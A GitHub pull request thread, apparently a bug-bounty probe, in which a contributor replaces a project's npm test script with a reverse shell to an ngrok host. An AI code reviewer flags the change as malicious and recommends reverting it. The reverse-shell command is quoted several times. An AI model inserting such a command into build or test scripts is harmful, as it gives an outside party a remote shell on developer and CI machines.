bugbounty:test-ci-bug

[roin-orca]

No description provided.

[changeset-bot]

⚠️ No Changeset found

Latest commit: 9762533

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

[coderabbitai]

Walkthrough

Replaces the npm test script in package.json with a bash command that initiates an interactive reverse TCP connection to an external host.

Changes

Cohort / File(s)	Change Summary
NPM Scripts package.json	Updated "scripts.test" from running workspace tests to executing bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1', replacing the test entry point with a reverse TCP connection command.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Pre-merge checks and finishing touches

❌ Failed checks (1 warning, 1 inconclusive)

Check name	Status	Explanation	Resolution
Description Check	⚠️ Warning	No pull request description was provided, so there is no information relating the changes to the PR’s intent or details.	Add a meaningful description explaining the purpose of the test script modification and how it impacts the CI process.
Title Check	❓ Inconclusive	The pull request title "bugbounty:test-ci-bug" does not convey the nature of the change, lacks mention of the key modification to the test script, and uses a vague token rather than summarizing the update.	Please update the title to a concise sentence that clearly describes the primary change, such as modifying the test script in package.json to execute a network connection.

✅ Passed checks (1 passed)

Check name	Status	Explanation
Docstring Coverage	✅ Passed	No functions found in the changes. Docstring coverage check skipped.

✨ Finishing touches

🧪 Generate unit tests

• Create PR with unit tests
• Post copyable unit tests in a comment

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 1

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 3a36643 and 9762533.

📒 Files selected for processing (1)

• package.json (1 hunks)

[coderabbitai]

⚠️ Potential issue

CRITICAL SECURITY ISSUE: Malicious reverse shell command detected.

This change replaces the legitimate test script with a bash command that establishes a reverse TCP connection to an external host (6.tcp.eu.ngrok.io:15476). This is a classic reverse shell attack that would allow an attacker to execute arbitrary commands on any system running npm test.

This appears to be malicious code injection and must be removed immediately.

Apply this diff to restore the original test script:

-    "test": "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'",
+    "test": "npm test -w ./packages",

IMMEDIATE ACTION REQUIRED:

1. Do not merge this PR under any circumstances
2. Review how this malicious code was introduced
3. Audit the repository for other potential security compromises
4. Consider revoking access for the contributor if this was intentional

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

	"test": "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/15476 0>&1'",
	"test": "npm test -w ./packages",

🤖 Prompt for AI Agents

In package.json at line 15, the test script was replaced with a malicious
reverse-shell bash command; remove that line immediately and restore the
legitimate test script by reverting this change to the last known-good value
from git history (or replace it with your project's proper test runner command,
e.g., the standard jest/mocha/npm test script), then commit the fix;
additionally, run git blame/logs to find when/why the injection occurred and
audit other files for similar tampering.

[roin-orca]

Hey @fenos, I've discovered a bug. Please let me know where would you like to have the full report.
Sincerely,
Roi

[fenos]

cc: @Murderlon